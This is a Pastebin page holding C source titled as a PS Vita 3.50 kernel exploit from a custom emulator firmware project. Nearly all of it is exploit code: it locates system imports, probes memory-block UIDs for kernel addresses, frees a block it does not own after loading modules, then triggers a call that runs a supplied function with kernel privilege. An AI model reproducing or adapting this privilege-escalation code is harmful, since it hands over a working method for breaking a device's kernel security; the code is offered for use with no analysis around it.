Advertisement
Guest User

PS Vita 3.50 Kernel Exploit #4

a guest
Apr 18th, 2015
4,030
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.     Custom Emulator Firmware
  3.     Copyright (C) 2012-2015, Total_Noob
  4.  
  5.     This program is free software: you can redistribute it and/or modify
  6.     it under the terms of the GNU General Public License as published by
  7.     the Free Software Foundation, either version 3 of the License, or
  8.     (at your option) any later version.
  9.  
  10.     This program is distributed in the hope that it will be useful,
  11.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.     GNU General Public License for more details.
  14.  
  15.     You should have received a copy of the GNU General Public License
  16.     along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17. */
  18.  
  19. #include <common.h>
  20.  
  21. #include "main.h"
  22. #include "libc.h"
  23. #include "utils.h"
  24.  
  25. #define MAX_UIDS 20
  26.  
  27. u32 address_list[MAX_UIDS];
  28.  
  29. int (* _sceKernelExitDeleteThread)(int status);
  30. int (* _sceUtility_private_7EBD6208)();
  31.  
  32. void RepairSysmem()
  33. {
  34. }
  35.  
  36. int load_thread()
  37. {
  38.     _sceUtility_private_7EBD6208();
  39.     return _sceKernelExitDeleteThread(0);
  40. }
  41.  
  42. void doExploit()
  43. {
  44.     /* Find imports in RAM */
  45.     void (* _sceKernelDcacheWritebackAll)() = (void *)FindImport("UtilsForUser", 0x79D1C3FA);
  46.     int (* _sceUtilityLoadModule)(int id) = (void *)FindImport("sceUtility", 0x2A2B3DE0);
  47.  
  48.     SceUID (* _sceKernelCreateThread)(const char *name, SceKernelThreadEntry entry, int initPriority, int stackSize, SceUInt attr, SceKernelThreadOptParam *option) = (void *)FindImport("ThreadManForUser", 0x446D8DE6);
  49.     int (* _sceKernelStartThread)(SceUID thid, SceSize arglen, void *argp) = (void *)FindImport("ThreadManForUser", 0xF475845D);
  50.     int (* _sceKernelWaitThreadEnd)(SceUID thid, SceUInt *timeout) = (void *)FindImport("ThreadManForUser", 0x278C0DF5);
  51.  
  52.     _sceKernelExitDeleteThread = (void *)FindImport("ThreadManForUser", 0x809CE29B);
  53.     _sceUtility_private_7EBD6208 = (void *)FindImport("sceUtility_private", 0x7EBD6208);
  54.  
  55.     SceUID (* _sceKernelAllocMemoryBlock)(const char *name, int type, u32 size, void *params) = (void *)FindImport("SysMemUserForUser", 0xFE707FDF);
  56.     int (* _sceKernelGetMemoryBlockAddr)(SceUID uid, void **ptr) = (void *)FindImport("SysMemUserForUser", 0xDB83A952);
  57.     int (* _sceKernelFreeMemoryBlock)(SceUID uid) = (void *)FindImport("SysMemUserForUser", 0x50F61D8A);
  58.  
  59.     if(!_sceKernelDcacheWritebackAll || !_sceUtilityLoadModule) ErrorFlashScreen();
  60.     if(!_sceKernelCreateThread || !_sceKernelStartThread || !_sceKernelWaitThreadEnd) ErrorFlashScreen();
  61.     if(!_sceKernelExitDeleteThread || !_sceUtility_private_7EBD6208) ErrorFlashScreen();
  62.     if(!_sceKernelAllocMemoryBlock || !_sceKernelGetMemoryBlockAddr || !_sceKernelFreeMemoryBlock) ErrorFlashScreen();
  63.  
  64.     /* Load required module */
  65.     _sceUtilityLoadModule(PSP_MODULE_NP_DRM);
  66.  
  67.     SceUID new_uid = _sceKernelAllocMemoryBlock("", PSP_SMEM_High, 1, NULL);
  68.  
  69.     SceUID uid_max = ((new_uid & 0xFFF00000) | 0x000FFFFF) + 0x100000;
  70.     SceUID uid_min = uid_max - 0x200000;
  71.  
  72.     int i;
  73.     SceUID uid;
  74.  
  75.     for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
  76.     {
  77.         u32 addr = 0;
  78.         _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);
  79.  
  80.         if(addr & 0x80000000)
  81.         {
  82.             address_list[i] = addr;
  83.             i++;
  84.         }
  85.     }
  86.  
  87.     /* Load first module */
  88.     _sceUtilityLoadModule(PSP_MODULE_AV_G729);
  89.  
  90.     int (* _sceG729EncodeTermResource)() = (void *)FindImport("sceG729", 0x94714D50);
  91.     if(!_sceG729EncodeTermResource) ErrorFlashScreen();
  92.  
  93.     int free = 0;
  94.  
  95.     for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
  96.     {
  97.         u32 addr = 0;
  98.         _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);
  99.  
  100.         if(addr & 0x80000000)
  101.         {
  102.             if(address_list[i] != addr)
  103.             {
  104.                 _sceKernelFreeMemoryBlock(uid);
  105.                 free = 1;
  106.                 break;
  107.             }
  108.  
  109.             i++;
  110.         }
  111.     }
  112.  
  113.     if(!free) ErrorFlashScreen();
  114.  
  115.     /* Load second module */
  116. /*  SceUID thid = _sceKernelCreateThread("load_thread", load_thread, 0x10, 0x1000, 0, NULL);
  117.     _sceKernelStartThread(thid, 0, NULL);
  118.     _sceKernelWaitThreadEnd(thid, NULL);*/
  119.     _sceUtility_private_7EBD6208();
  120.  
  121.     _sceKernelDcacheWritebackAll();
  122.  
  123.     /* Execute with kernel privilege */
  124.     _sceG729EncodeTermResource();
  125.  
  126.     /* Restore registers */
  127.     asm("addiu $sp, $sp, -16\n");
  128.     asm("move $s0, $k1\n");
  129.  
  130.     /* Execute kernel function */
  131.     void (* execute)() = (void *)((u32)kernel_function | 0x80000000);
  132.     execute();
  133. }
Advertisement
RAW Paste Data Copied
Advertisement